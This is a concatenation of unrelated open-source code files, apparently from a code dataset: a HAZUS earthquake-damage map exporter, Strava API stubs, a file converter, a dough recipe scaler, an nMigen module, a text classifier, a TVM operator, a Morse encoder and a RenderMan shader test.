specific data needed def building_inspection_needs(self, cursor): """This function creates the building inspection needs map by querying the eqTractDmg table in the SQL Server database.""" self.logger.info("You want to make a building inspection needs map!") # Get the data from SQL Server building_inspection_sql = """ SELECT Tract, Sum(PDsSlightBC) as PDsSlightBC, Sum(PDsModerateBC) as PDsModerateBC, Sum(PDsExtensiveBC) as PDsExtensiveBC, Sum(PDsCompleteBC) as PDsCompleteBC FROM eqTractDmg WHERE DmgMechType='STR' GROUP BY Tract """ cursor.execute(building_inspection_sql) inspection_tracts = cursor.fetchall() # Update the corresponding fields in the StudyRegionData.mdb\eqTract table fc = self.study_region_data + "\\eqTract" for ins_tract in inspection_tracts: tract = ins_tract.Tract slight = ins_tract.PDsSlightBC moderate = ins_tract.PDsModerateBC extensive = ins_tract.PDsExtensiveBC complete = ins_tract.PDsCompleteBC query = '[Tract] = ' + '\'' + tract + '\'' fields = ['PDsSlightBC', 'PDsModerateBC', 'PDsExtensiveBC', 'PDsCompleteBC', 'SL_MO_TOT'] with da.UpdateCursor(fc, fields, query) as urows: for urow in urows: urow[0] = slight urow[1] = moderate urow[2] = extensive urow[3] = complete urow[4] = slight + moderate urows.updateRow(urow) self.update_fc(fc, 'PDsSlightBC') # Update and export the map mxd = self.scenario_data_dir + "\\Maps\\BuildingInspectionNeeds.mxd" map_name = "BuildingInspectionNeeds" self.update_and_export_map(mxd, map_name) def direct_economic_loss(self, cursor): """This function creates a direct economic loss map by querying the eqTractEconLoss table in the SQL Server database.""" self.logger.info("You want to make a direct economic loss map!") # Get the data from SQL Server economic_loss_sql = """ SELECT Tract, Sum(TotalLoss) as TotalLoss FROM eqTractEconLoss GROUP BY Tract """ cursor.execute(economic_loss_sql) del_tracts = cursor.fetchall() # Update the corresponding fields in the StudyRegionData.mdb\eqTract table fc = self.study_region_data + "\\eqTract" for del_tract in del_tracts: tract = del_tract.Tract total_econ_loss = del_tract.TotalLoss query = '[Tract] = ' + '\'' + tract + '\'' fields = ['TotalEconLoss'] with da.UpdateCursor(fc, fields, query) as urows: for urow in urows: urow[0] = total_econ_loss urows.updateRow(urow) self.update_fc(fc, 'TotalEconLoss') # Update and export the map mxd = self.scenario_data_dir + "\\Maps\\DirectEconomicLoss.mxd" map_name = "DirectEconomicLoss" self.update_and_export_map(mxd, map_name) def estimated_debris(self, cursor): """This function creates an estimated debris map by querying the eqTract table in the SQL Server database.""" self.logger.info("You want to make an estimated debris map!") # Get the data from SQL Server debris_sql = """ SELECT Tract, DebrisS, DebrisC, DebrisTotal FROM eqTract """ cursor.execute(debris_sql) debris_tracts = cursor.fetchall() # Update the corresponding fields in the StudyRegionData.mdb\eqTract table fc = self.study_region_data + "\\eqTract" for debris_tract in debris_tracts: tract = debris_tract.Tract debriss = debris_tract.DebrisS debrisc = debris_tract.DebrisC debris_total = debris_tract.DebrisTotal query = '[Tract] = ' + '\'' + tract + '\'' fields = ['DebrisS', 'DebrisC', 'DebrisTotal'] with da.UpdateCursor(fc, fields, query) as urows: for urow in urows: urow[0] = debriss urow[1] = debrisc urow[2] = debris_total urows.updateRow(urow) self.update_fc(fc, 'DebrisTotal') # Update and export the map mxd = self.scenario_data_dir + "\\Maps\\EstimatedDebris.mxd" map_name = "EstimatedDebris" self.update_and_export_map(mxd, map_name) def highway_infrastructure_damage(self, cursor): """This function creates a highway Infrastructure damage map by querying the eqHighwayBridge and eqHighwaySegement tables in the SQL Server database.""" self.logger.info("You want to make a highway Infrastructure damage map!") # Get the data from SQL Server highways_sql = """ SELECT HighwaySegID, PDsExceedModerate, FunctDay1, EconLoss FROM eqHighwaySegment """ cursor.execute(highways_sql) highways = cursor.fetchall() # Update the corresponding fields in the StudyRegionData.mdb\eqHighwaySegment table highway_fc = self.study_region_data + "\\eqHighwaySegment" for highway in highways: highway_id = highway.HighwaySegID highway_moderate = highway.PDsExceedModerate highway_functday1 = highway.FunctDay1 highway_econ_loss = highway.EconLoss query = '[HighwaySegID] = ' + '\'' + highway_id + '\'' fields = ['PDsExceedModerate', 'FunctDay1', 'EconLoss'] with da.UpdateCursor(highway_fc, fields, query) as urows: for urow in urows: urow[0] = highway_moderate urow[1] = highway_functday1 urow[2] = highway_econ_loss urows.updateRow(urow) self.update_fc(highway_fc, 'PDsExceedModerate') # Get the data from SQL Server bridges_sql = """ SELECT HighwayBridgeID, PDsExceedModerate, FunctDay1, EconLoss FROM eqHighwayBridge """ cursor.execute(bridges_sql) bridges = cursor.fetchall() # Update the corresponding fields in the StudyRegionData.mdb\eqHighwayBridge table bridge_fc = self.study_region_data + "\\eqHighwayBridge" for bridge in bridges: bridge_id = bridge.HighwayBridgeID bridge_moderate = bridge.PDsExceedModerate bridge_functday1 = bridge.FunctDay1 bridge_econ_loss = bridge.EconLoss query = '[HighwayBridgeId] = ' + '\'' + bridge_id + '\'' fields = ['PDsExceedModerate', 'FunctDay1', 'EconLoss'] with da.UpdateCursor(bridge_fc, fields, query) as urows: for urow in urows: urow[0] = bridge_moderate urow[1] = bridge_functday1 urow[2] = bridge_econ_loss urows.updateRow(urow) self.update_fc(bridge_fc, 'PDsExceedModerate') # Update and export the map mxd = self.scenario_data_dir + "\\Maps\\HighwayInfrastructureDamage.mxd" map_name = "HighwayInfrastructureDamage" self.update_and_export_map(mxd, map_name) def impaired_hospitals(self, cursor): """This function creates an impaired hospitals map by querying the eqCareFlty table for hospital performance data and the eqTractCasOccup table for life threatening injury data.""" self.logger.info("You want to make an impaired hospitals map!") # Get the data from SQL Server hospital_sql = """ SELECT CareFltyID, PDsExceedModerate, FunctDay1, EconLoss FROM eqCareFlty """ injury_sql = """ SELECT Tract, Sum(Level1Injury) as Level1Injury, Sum(Level2Injury) as Level2Injury, Sum(Level3Injury) as Level3Injury, Sum(Level4Injury) as Level4Injury FROM eqTractCasOccup WHERE CasTime = 'D' AND InOutTot = 'TOT' GROUP BY Tract """ cursor.execute(hospital_sql) hospitals = cursor.fetchall() # Update the corresponding fields in the StudyRegionData.mdb\eqCareFlty table hospital_fc = self.study_region_data + "\\eqCareFlty" for hospital in hospitals: hospital_id = hospital.CareFltyID hospital_moderate = hospital.PDsExceedModerate hospital_functday1 = hospital.FunctDay1 hospital_econ_loss = hospital.EconLoss query = '[CareFltyId] = ' + '\'' + hospital_id + '\'' fields = ['PDsExceedModerate', 'FunctDay1', 'EconLoss'] with da.UpdateCursor(hospital_fc, fields, query) as urows: for urow in urows: urow[0] = hospital_moderate urow[1] = hospital_functday1 urow[2] = hospital_econ_loss urows.updateRow(urow) self.update_fc(hospital_fc, 'PDsExceedModerate') # Update the corresponding fields in the StudyRegionData.mdb\eqTract table cursor.execute(injury_sql) injury_tracts = cursor.fetchall() fc = self.study_region_data + "\\eqTract" for injury_tract in injury_tracts: tract = injury_tract.Tract level1 = injury_tract.Level1Injury level2 = injury_tract.Level2Injury level3 = injury_tract.Level3Injury level4 = injury_tract.Level4Injury query = '[Tract] = ' + '\'' + tract + '\'' fields = ['Level1Injury', 'Level2Injury', 'Level3Injury', 'Level4Injury', 'SUM_2_3'] with da.UpdateCursor(fc, fields, query) as urows: for urow in urows: urow[0] = level1 urow[1] = level2 urow[2] = level3 urow[3] = level4 urow[4] = level2 + level3 urows.updateRow(urow) self.update_fc(fc, 'Level1Injury') # Update and export the map mxd = self.scenario_data_dir + "\\Maps\\ImpairedHospitals.mxd" map_name = "ImpairedHospitals" self.update_and_export_map(mxd, map_name) def search_and_rescue_needs(self, cursor): """This function creates a search and rescue needs map by querying the eqTractDmg table in the SQL Server database. Search and rescue needs are represented by red tag (complete) damage buildings. Only a portion of these buildings would be expected to collapse (e.g., 15 percent of URMs).""" self.logger.info("You want to make a search and rescue needs map!") # Get the data from SQL Server sar_sql = """ SELECT Tract, Sum(PDsCompleteBC) as PDsCompleteBC FROM eqTractDmg WHERE DmgMechType='STR' GROUP BY Tract """ cursor.execute(sar_sql) sar_tracts = cursor.fetchall() # Update the corresponding fields in the StudyRegionData.mdb\eqTract table fc = self.study_region_data + "\\eqTract" for sar_tract in sar_tracts: tract = sar_tract.Tract complete = sar_tract.PDsCompleteBC query = '[Tract] = ' + '\'' + tract + '\'' fields = ['PDsCompleteBC'] with da.UpdateCursor(fc, fields, query) as urows: for urow in urows: urow[0] = complete urows.updateRow(urow) self.update_fc(fc, 'PDsCompleteBC') # Update and export the map mxd = self.scenario_data_dir + "\\Maps\\SearchandRescueNeeds.mxd" map_name = "SearchandRescueNeeds" self.update_and_export_map(mxd, map_name) def shelter_needs(self, cursor): """This function creates a shelter needs map by querying the eqTract table in the SQL Server database.""" self.logger.info("You want to make a shelter needs map!") # Get the data from SQL Server shelter_sql = """ SELECT Tract, ShortTermShelter, DisplacedHouseholds, ExposedPeople, ExposedValue FROM eqTract """ cursor.execute(shelter_sql) shelter_tracts = cursor.fetchall() # Update the corresponding fields in the StudyRegionData.mdb\eqTract table fc = self.study_region_data + "\\eqTract" for shelter_tract in shelter_tracts: tract = shelter_tract.Tract displaced = shelter_tract.DisplacedHouseholds shelter = shelter_tract.ShortTermShelter exposed_people = shelter_tract.ExposedPeople exposed_value = shelter_tract.ExposedValue query = '[Tract] = ' + '\'' + tract + '\'' fields = ['DisplacedHouseholds', 'ShortTermShelter', 'ExposedPeople', 'ExposedValue'] with da.UpdateCursor(fc, fields, query) as urows: for urow in urows: urow[0] = displaced urow[1] = shelter urow[2] = exposed_people urow[3] = exposed_value urows.updateRow(urow) self.update_fc(fc, 'DisplacedHouseholds') # Update and export the map mxd = self.scenario_data_dir + "\\Maps\\ShelterNeeds.mxd" map_name = "ShelterNeeds" self.update_and_export_map(mxd, map_name) def utility_damage(self, cursor): """THis function creates a utility damage map by querying the eqElectricPowerFlty, eqOilFlty and eqNaturalGasFlty tables in the SQL Server database.""" self.logger.info("You want to make a utility damage map!") # Get the datat from SQL Server electric_flty_sql = """ SELECT ElectricPowerFltyID, PDsExceedModerate, FunctDay1, EconLoss FROM eqElectricPowerFlty """ cursor.execute(electric_flty_sql) electric_facilities = cursor.fetchall() # Update the corresponding fields in the StudyRegionData.mdb\eqElectricPowerFlty table electric_fc = self.study_region_data + "\\eqElectricPowerFlty" for electric_facility in electric_facilities: electric_flty_id = electric_facility.ElectricPowerFltyID electric_flty_moderate = electric_facility.PDsExceedModerate electric_flty_funct_day1 = electric_facility.FunctDay1 electric_flty_econ_loss = electric_facility.EconLoss query = '[ElectricPowerFltyID] = ' + '\'' + electric_flty_id + '\'' fields = ['PDsExceedModerate', 'FunctDay1', 'EconLoss'] with da.UpdateCursor(electric_fc, fields, query) as urows: for urow in urows: urow[0] = electric_flty_moderate urow[1] = electric_flty_moderate urow[2] = electric_flty_econ_loss urows.updateRow(urow) self.update_fc(electric_fc, 'PDsExceedModerate') # Get the datat from SQL Server natural_gas_flty_sql = """ SELECT NaturalGasFltyID, PDsExceedModerate, FunctDay1, EconLoss FROM eqNaturalGasFlty """ cursor.execute(natural_gas_flty_sql) natural_gas_facilities = cursor.fetchall() # Update the corresponding fields in the StudyRegionData.mdb\eqNaturalGasFlty table ng_fc = self.study_region_data + "\\eqNaturalGasFlty" for natural_gas_facility in natural_gas_facilities: natural_gas_flty_id = natural_gas_facility.NaturalGasFltyID natural_gas_flty_moderate = natural_gas_facility.PDsExceedModerate natural_gas_flty_funct_day1 = natural_gas_facility.FunctDay1 natural_gas_flty_econ_loss = natural_gas_facility.EconLoss query = '[NaturalGasFltyID] = ' + '\'' + natural_gas_flty_id + '\'' fields = ['PDsExceedModerate', 'FunctDay1', 'EconLoss'] with da.UpdateCursor(ng_fc, fields, query) as urows: for urow in urows: urow[0] = natural_gas_flty_moderate urow[1] = natural_gas_flty_moderate urow[2] = natural_gas_flty_econ_loss urows.updateRow(urow) self.update_fc(ng_fc, 'PDsExceedModerate') # Get the datat from SQL Server oil_flty_sql = """ SELECT OilFltyID, PDsExceedModerate, FunctDay1, EconLoss FROM eqOilFlty """ cursor.execute(oil_flty_sql) oil_facilities = cursor.fetchall() # Update the corresponding fields in the StudyRegionData.mdb\eqOilFlty table oil_fc = self.study_region_data + "\\eqOilFlty" for oil_facility in oil_facilities: oil_flty_id = oil_facility.OilFltyID oil_flty_moderate = oil_facility.PDsExceedModerate oil_flty_funct_day1 = oil_facility.FunctDay1 oil_flty_econ_loss = oil_facility.EconLoss query = '[OilFltyID] = ' + '\'' + oil_flty_id + '\'' fields = ['PDsExceedModerate', 'FunctDay1', 'EconLoss'] with da.UpdateCursor(oil_fc, fields, query) as urows: for urow in urows: urow[0] = oil_flty_moderate urow[1] = oil_flty_moderate urow[2] = oil_flty_econ_loss urows.updateRow(urow) self.update_fc(oil_fc, 'PDsExceedModerate') # Update and export the map mxd = self.scenario_data_dir + "\\Maps\\UtilityDamage.mxd" map_name = "UtilityDamage" self.update_and_export_map(mxd, map_name) def water_infrastructure_damage(self, cursor): """This function creates a potable water infrastructure damage map by querying the eqPotableWaterDL table in the SQL Server database.""" self.logger.info("You want to make a water Infrastructure damage map!") # Get the data from SQL Server water_sql = """ SELECT Tract, TotalPipe, TotalNumRepairs, TotalDysRepairs, EconLoss, Cost FROM eqPotableWaterDL """ cursor.execute(water_sql) water_tracts = cursor.fetchall() # Update the corresponding fields in the StudyRegionData.mdb\eqPotableWaterDL table fc = self.study_region_data + "\\eqPotableWaterDL" for water_tract in water_tracts: tract = water_tract.Tract total_pipe = water_tract.TotalPipe total_repairs = water_tract.TotalNumRepairs total_days = water_tract.TotalDysRepairs econ_loss = water_tract.EconLoss cost = water_tract.Cost query = '[Tract] = ' + '\'' + tract + '\'' fields = ['TotalPipe', 'TotalNumRepairs', 'TotalDysRepairs', 'EconLoss', 'Cost'] with da.UpdateCursor(fc, fields, query) as urows: for urow in urows: urow[0] = total_pipe urow[1] = total_repairs urow[2] = total_days urow[3] = econ_loss urow[4] = cost urows.updateRow(urow) self.update_fc(fc, 'EconLoss') # Update and export the map mxd = self.scenario_data_dir + "\\Maps\\WaterInfrastructureDamage.mxd" map_name = "WaterInfrastructureDamage" self.update_and_export_map(mxd, map_name) def update_fc(self, fc, field): """This function updates a feature class that removes all of the records from the geodatabase that are not part of the study region. The fc parameter is the feature class to update and the field parameter is the field in the feature class that was updated with data from the HAZUS database. Records not part of the study region will have a field value of NULL.""" query = '[' + field + '] IS NULL' with da.UpdateCursor(fc, '*', query) as urows: for urow in urows: urows.deleteRow() # 6.d Update the template mxds with a new extent # Map symbology should be set from the template lyr files def update_and_export_map(self, mxd, map_name): """This function takes a path to an mxd on disk and a map name as input. Using the arcpy module, it then sets the extent of the data frame to match all of the Census Tracts in the study region. The map elements are updated to match the author name and reflect any tabular information contained on the map layout.""" current_map = mapping.MapDocument(mxd) df = mapping.ListDataFrames(current_map, "Template_Data")[0] # Set the map extent to match the one calculated in the determine_map_extent # function. Per the ArcGIS documentation, copy the existing data frame # extent before modifying it. new_extent = df.extent new_extent.XMin = self.map_extent["XMin"] new_extent.XMax = self.map_extent["XMax"] new_extent.YMin = self.map_extent["YMin"] new_extent.YMax = self.map_extent["YMax"] df.extent = new_extent current_map.save() self.sb.SetStatusText("Updated: " + mxd) # 6.e Export maps as PDF and JPEG pdf_out_dir = self.scenario_dir + "\\PDF" jpeg_out_dir = self.scenario_dir + "\\JPEG" mapping.ExportToPDF(current_map, pdf_out_dir + "\\" + map_name + ".pdf") mapping.ExportToJPEG(current_map, jpeg_out_dir + "\\" + map_name + ".jpeg", resolution=200) self.sb.SetStatusText("Exported: " + map_name) # 7. View log files if desired def __initlogging(self): """Initialize a log file to view all of the settings and error information each time the script runs.""" self.logger = logging.getLogger("HAZUSMapCreatorLog") self.logger.setLevel(logging.DEBUG) # Create a file handler ch = logging.FileHandler(self.logfile) ch.setLevel(logging.DEBUG) # Format the logfile entries formatter = logging.Formatter("[%(asctime)s][%(name)s:%(lineno)d][%(levelname)s] %(message)s") # add formatter to ch ch.setFormatter(formatter) # add ch to logger self.logger.addHandler(ch) try: app = wx.App() frame = MainFrame(None) frame.Show() app.MainLoop() except: # Error handling code from ArcGIS Resource Center tb = sys.exc_info()[2] tbinfo = traceback.format_tb(tb)[0] pymsg = "PYTHON ERRORS:\nTraceback Info:\n" + tbinfo + "\nError Info:\n " + str(sys.exc_type) + ": " + str( sys.exc_value) + "\n" print pymsg ```
{ "source": "JoshGuarino/stravapy", "score": 2 }
#### File: stravapy/resources/routes.py ```python from request import Request class Routes(object): def get_route_as_gpx(): return def ger_route_as_tcx(): return def get_route_by_id(): return def get_routes_by_athlete_id(): return ``` #### File: stravapy/resources/segments.py ```python from request import Request class Segments(object): def explore_segments(): return def get_logged_in_athlete_starred_segments(): return def get_segment_by_id(): return def star_segment(): return ``` #### File: stravapy/resources/uploads.py ```python from request import Request class Uploads(object): def create_upload(): return def get_upload_by_id(): return ``` #### File: stravapy/stravapy/stravapy.py ```python from resources import * from request import Request from oauth import Oauth class Stravapy: def __init__(self, access_token): self.access_token = access_token self.base_url = 'https://www.strava.com/api/v3' self.headers = { 'Authorization' : f'Bearer: {access_token}' } self.activities = activities.Activities self.athlete = athlete.Athlete self.clubs = clubs.Clubs self.gear = gear.Gear self.routes = routes.Routes self.running_races = running_races.RunningRaces self.segment_efforts = segment_efforts.SegmentEfforts self.segments = segments.Segments self.streams = streams.Streams self.uploads = uploads.Uploads ```
{ "source": "joshgyn/FileConverter", "score": 3 }
#### File: joshgyn/FileConverter/main.py ```python from wand.image import Image as wi import os.path from os import path import argparse def get_arguments(): # gets arguments and files from user parser = argparse.ArgumentParser() parser.add_argument("-f", "--file", dest="file", help="File to be converted, (e.g. sample.pdf, apple.png, baseball.jpg).") parser.add_argument("-ct" , "--convert_type", dest="convert_type", help="New file type to be converted to, (e.g. png or jpg).") (options) = parser.parse_args() if not options.file: parser.error("[-] Please specify a file, use --help for more info.") elif not options.convert_type: parser.error("[-] Please specify a file type to be converted to, use --help for more info.") return options def check_file(options): # checks if file, and file type to be converted exsits try: print(f"[+] Checking if {options.file} exsits.") if path.exists(options.file) == True: print(f"[+] File {options.file} found.") file_name = options.file[:-4] try: extension_list = {"pdf": "pdf", "png": "png", "jpg": "jpeg", "gif": "gif", "tif": "tif", "bmp": "bmp", "eps": "eps"} file_extension = extension_list[options.convert_type] return file_name, file_extension except KeyError: print(f"[-] File type {options.convert_type} to be converted to was not found. Please check the extension before trying again, (e.g. png or jpg).") else: print(f"[-] File {options.file} not found. Please check the name and extension before trying again. (e.g. sample.pdf).") exit() except Exception as msg: report_issue(msg) def convert_file(options, file_name, file_extension): # converts files to other formats try: print(f"[+] Converting {options.file} to {file_name}.{options.convert_type}") pdf = wi(filename=options.file, resolution=300) pdfimage = pdf.convert(file_extension) i=1 for img in pdfimage.sequence: page = wi(image=img) page.save(filename=f"{file_name}{str(i)}.{options.convert_type}") i +=1 print("[+] File was successfully converted.") except Exception as msg: exception_ghostscript = 'FailedToExecuteCommand `"gswin64c.exe"' exception_ghostscript_compare = str(msg) if exception_ghostscript == exception_ghostscript_compare[:38]: print("[-] File was not successfully converted.\n") print("There is an issue with ghostscript. Reinstall or download latest version and try again.") print("Visit: https://github.com/PeanutTheAdmin/FileConverter for install instructions.\n") else: print("[-] File was not successfully converted.") report_issue(msg) def report_issue(msg): print(f"[BUG] {msg}\n") print("To report this issue go to: https://github.com/PeanutTheAdmin/FileConverter/issues") print("When reporting this issue include the output after [BUG]\n") def main(): # Main Function options = get_arguments() file_name, file_extension = check_file(options) convert_file(options, file_name, file_extension) if __name__ == "__main__": main() ```
{ "source": "josh-hadley/dough-doh", "score": 4 }
#### File: josh-hadley/dough-doh/dough-doh.py ```python import argparse from collections import namedtuple Ingredient = namedtuple("Ingredient", ["name", "amount", "units"]) MASTER_RECIPE = [ Ingredient("Water", 101.66, "g"), Ingredient("Fresh Yeast", 0.5, "g"), Ingredient("Dry Yeast", 0.2, "g"), Ingredient("Olive Oil", 3.33, "ml"), Ingredient("00 Flour", 166.66, "g"), Ingredient("Sea Salt", 4, "g"), ] def scale_recipe(multiplier: int, fresh: bool=False): if fresh: base = filter(lambda x: x.name != "Dry Yeast", MASTER_RECIPE) else: base = filter(lambda x: x.name != "Fresh Yeast", MASTER_RECIPE) scaled = [ Ingredient(x.name, round(x.amount * multiplier, 2), x.units) for x in base] return scaled def format_recipe(recipe, multiplier: int) -> str: t = f"INGREDIENTS FOR {multiplier} DOUGH BALL{'S' if multiplier != 1 else ''}\n" t += "-" * (len(t) - 1) + "\n" s = "\n".join( [f"{x.name:<8}\t{x.amount:>7,.1f} {x.units:<3}" for x in recipe]) return t + s + "\n" def main(): parser = argparse.ArgumentParser() parser.add_argument("multiplier", type=int, default=1) parser.add_argument("-f", "--fresh-yeast", action="store_true") args = parser.parse_args() scaled = scale_recipe(args.multiplier, args.fresh_yeast) print(format_recipe(scaled, args.multiplier)) if __name__ == '__main__': main() ```
{ "source": "joshhamlin/Morse-code", "score": 4 }
#### File: joshhamlin/Morse-code/morse.py ```python def toMorse(Main): MorseFinAry = [] Tarry = list(Main) for char in Tarry: if char.lower() == "a": MorseFinAry.append(".- ") elif char.lower() == "b": MorseFinAry.append("-... ") elif char.lower() == "c": MorseFinAry.append("-.-. ") elif char.lower() == 'd': MorseFinAry.append("-.. ") elif char.lower() == 'e': MorseFinAry.append(". ") elif char.lower() == 'f': MorseFinAry.append("..-. ") elif char.lower() == 'g': MorseFinAry.append("--. ") elif char.lower() == 'h': MorseFinAry.append(".... ") elif char.lower() == 'i': MorseFinAry.append(".. ") elif char.lower() == 'j': MorseFinAry.append(".--- ") elif char.lower() == 'k': MorseFinAry.append("-.- ") elif char.lower() == 'l': MorseFinAry.append(".-.. ") elif char.lower() == 'm': MorseFinAry.append("-- ") elif char.lower() == 'n': MorseFinAry.append("-. ") elif char.lower() == 'o': MorseFinAry.append("--- ") elif char.lower() == 'p': MorseFinAry.append(".--. ") elif char.lower() == 'q': MorseFinAry.append("--.- ") elif char.lower() == 'r': MorseFinAry.append(".-. ") elif char.lower() == 's': MorseFinAry.append("... ") elif char.lower() == 't': MorseFinAry.append("- ") elif char.lower() == 'u': MorseFinAry.append("..- ") elif char.lower() == 'v': MorseFinAry.append("...- ") elif char.lower() == 'w': MorseFinAry.append(".-- ") elif char.lower() == 'x': MorseFinAry.append("-..- ") elif char.lower() == 'y': #and z MorseFinAry.append("-.-- ") elif char.lower() == 'z': MorseFinAry.append("--.. ") elif char == "1": MorseFinAry.append(".---- ") elif char == "2": MorseFinAry.append("..--- ") elif char == "3": MorseFinAry.append("...-- ") elif char == '4': MorseFinAry.append("....- ") elif char == '5': MorseFinAry.append("..... ") elif char == '6': MorseFinAry.append("-.... ") elif char == '7': MorseFinAry.append("--... ") elif char == '8': MorseFinAry.append("---.. ") elif char == '9': MorseFinAry.append("----. ") elif char == '0': MorseFinAry.append("----- ") elif char == '.': MorseFinAry.append(".-.-.- ") elif char == ',': MorseFinAry.append("--..-- ") elif char == "?": MorseFinAry.append("..--..") elif char == '/': MorseFinAry.append("-..-.") elif char == '@': MorseFinAry.append(".--.-. ") elif char == " ": MorseFinAry.append("| ") else: print("char not valid") return MorseFinAry while True: print("Type [help] if you are unsure how to use this\n") InMain = input("Type a string or morse code -->") if InMain == "[help]": print("When typing in strings just type as you normally would\n") print("Case will not effect the out put because mores code does not account for case\n") print("example --> Type a string or morse code -->I would like to read this in morse code \n") print("you can use the following in your sting |a - z|, |0 - 9|, '.', ',', '?', '/' and '@' ") #works good converting to morse code Pans = toMorse(InMain) print(''.join(Pans)) #works we just need to hadel funny in put and tuch of UI ```
{ "source": "joshhead/gcn-bluetooth", "score": 2 }
#### File: gcn-bluetooth/joybusutils/test_tinymodule.py ```python from nmigen import Module from nmigen.sim.pysim import Simulator, Tick from tinymodule import TinyModule from nmigen.test.utils import FHDLTestCase import unittest CLOCK_PERIOD = 1/12_000_000 class TinyModuleTest(FHDLTestCase): def setUp(self): self.tinymodule = TinyModule() self.sim = Simulator(self.tinymodule) self.sim.add_clock(CLOCK_PERIOD) def test_output_starts_at_0(self): def process(): self.assertEqual((yield self.tinymodule.output), 0) self.sim.add_sync_process(process) self.sim.run() def test_output_toggles_after5_ticks(self): def process(): for _ in range(4): yield Tick() self.assertEqual((yield self.tinymodule.output), 0) for _ in range(32): yield Tick() self.assertEqual((yield self.tinymodule.output), 1) self.sim.add_sync_process(process) self.sim.run() if __name__ == "__main__": unittest.main() ``` #### File: gcn-bluetooth/joybusutils/tinymodule.py ```python from nmigen import Elaboratable, Signal, Module from nmigen.sim.pysim import Simulator, Tick from tabulate import tabulate class TinyModule(Elaboratable): def __init__(self): self.counter = Signal(5) self.output = Signal() def ports(self): return [self.output] def elaborate(self, platform): m = Module() m.d.sync += self.counter.eq(self.counter + 1) # Once high, output should stay high. with m.If(self.output == 1): m.d.comb += self.output.eq(1) # Otherwise, wait for 5 clock ticks with m.Elif(self.counter == 5): m.d.comb += self.output.eq(1) return m if __name__ == "__main__": tinymodule = TinyModule() sim = Simulator(tinymodule) sim_results = [] def process(): # Enough ticks for the counter to overflow for i in range(35): sim_results.append([i, (yield tinymodule.counter), (yield tinymodule.output)]) yield Tick() sim.add_sync_process(process) # 12mhz clock sim.add_clock(1/12_000_000) with sim.write_vcd("tinymodule_sim.vcd", "tinymodule_sim.gtkw", traces=tinymodule.ports()): sim.run() print(tabulate(sim_results, headers=["Clock", "Counter", "Output"])) ```
{ "source": "Josh-Hegewald/uci-statnlp", "score": 4 }
#### File: uci-statnlp/hw1/classify.py ```python def train_classifier(X, y): """Train a classifier using the given training data. Trains a logistic regression on the input data with default parameters. """ from sklearn.linear_model import LogisticRegression from sklearn.model_selection import GridSearchCV cls = LogisticRegression() param_grid = { 'C': [100], 'penalty': ['l2'], 'max_iter': list(range(400, 600, 200)), 'solver': ['lbfgs'] } param_search = GridSearchCV(cls, param_grid=param_grid, refit=True, verbose=3, cv=3) param_search.fit(X, y) print("printing grid scores") print(param_search.cv_results_) import matplotlib.pyplot as plt print(param_grid['C']) print(param_search.cv_results_['mean_test_score']) plt.plot(param_grid['C'], param_search.cv_results_['mean_test_score']) import seaborn as sns return param_search def evaluate(X, yt, cls): """Evaluated a classifier on the given labeled data using accuracy.""" from sklearn import metrics yp = cls.predict(X) acc = metrics.accuracy_score(yt, yp) print(" Accuracy", acc) ```
{ "source": "joshherr-quic/tvm", "score": 2 }
#### File: ethosu/te/identity.py ```python from tvm import te from .dma import read_compute, write_compute def identity_compute( ifm: te.Tensor, lut: te.Tensor, ifm_scale: float, ifm_zero_point: int, ofm_scale: float, ofm_zero_point: int, activation: str, ) -> te.Tensor: """A compute operator for the NPU identity operator. Parameters ---------- ifm : te.Tensor The Input Feature Map tensor (IFM). lut : te.Tensor The look-up table values to use if activation is "LUT", "TANH" or "SIGMOID". ifm_scale : float The quantization scale for the Input Feature Map tensor. ifm_zero_point : int The quantization zero point for the Input Feature Map tensor. ofm_scale : float The quantization scale for the Output Feature Map tensor. ofm_zero_point : int The quantization zero point for the Output Feature Map tensor. activation : str The activation function to use. "NONE" - no activation function. "TANH" - tanh activation function. "SIGMOID" - sigmoid activation function. "LUT" - use a look-up table to perform the activation function. Returns ------- te.Tensor The Output Feature Map tensor. """ dmaed_ifm = read_compute(ifm, ifm_zero_point, ifm_scale) id_attrs = {"op": "ethosu_identity", "activation": activation} # This is a trick to insert the LUT tensor into the TE graph if LUT is present lut_expr = (lut[0] + lut[255]).astype(ifm.dtype) if activation in ("TANH", "LUT") else 0 # Add the LUT tensor to the attributes to be able to later tell which tensor is the LUT if activation in ("TANH", "LUT"): id_attrs["lut"] = lut identity = te.compute( ifm.shape, lambda *i: (dmaed_ifm(*i) + lut_expr).astype(ifm.dtype), name="ethosu_identity", attrs=id_attrs, ) dmaed_ofm = write_compute(identity, ofm_zero_point, ofm_scale) return dmaed_ofm ```
{ "source": "JoshhhBailey/rman-toiletroll", "score": 2 }
#### File: JoshhhBailey/rman-toiletroll/shaderTesting.py ```python import prman import sys import sys,os.path,subprocess def CreateCube(width = 1.0, height = 1.0, depth = 1.0): # The following function is from: # <NAME>,. 2020. Introduction to Renderman and Python. [online] # Available from: https://nccastaff.bournemouth.ac.uk/jmacey/msc/renderman/lectures/Lecture1/ # Accessed [23 March 2021] w = width / 2.0 h = height / 2.0 d = depth / 2.0 # Rear face = [-w, -h, d, -w, h, d, w, -h, d, w, h, d] ri.Patch("bilinear", {'P':face}) # Front face = [-w, -h, -d, -w, h, -d, w, -h, -d, w, h, -d] ri.Patch("bilinear", {'P':face}) # Left face = [-w, -h, -d, -w, h, -d, -w, -h, d, -w, h, d] ri.Patch("bilinear", {'P':face}) # Right face = [w, -h, -d, w, h, -d, w, -h, d, w, h, d] ri.Patch("bilinear", {'P':face}) # Bottom face = [w, -h, d, w, -h, -d, -w, -h, d, -w, -h, -d] ri.Patch("bilinear", {'P':face}) # Top face = [w, h, d, w, h, -d, -w, h, d, -w, h, -d] ri.Patch("bilinear", {'P':face}) def CompileShader(shader): # The following function is from: # <NAME>., 2018. Lecture4Shaders. [online] # Available from: https://github.com/NCCA/Renderman/blob/master/Lecture4Shaders/Bands/bands.py # Accessed [25 March 2021] if os.path.isfile(shader + ".oso") != True or os.stat(shader + ".osl").st_mtime - os.stat(shader + ".oso").st_mtime > 0: print("compiling shader %s" %(shader)) try: subprocess.check_call(["oslc", shader + ".osl"]) except subprocess.CalledProcessError: sys.exit("shader compilation failed") if __name__ == "__main__": CompileShader("shaders/testShader") ri = prman.Ri() # Create RenderMan interface instance ri.Begin("__render") # Begin .rib and pass to renderer ri.Display("toiletroll.exr", "framebuffer", "rgba") # File, Buffer, Colour Channels ri.Format(512, 512, 1) # Width, Height, Aspect Ratio # Camera coordinate system ri.Projection(ri.PERSPECTIVE) ri.Translate(0, 0, 2) # World coordinate system ri.WorldBegin() # Create 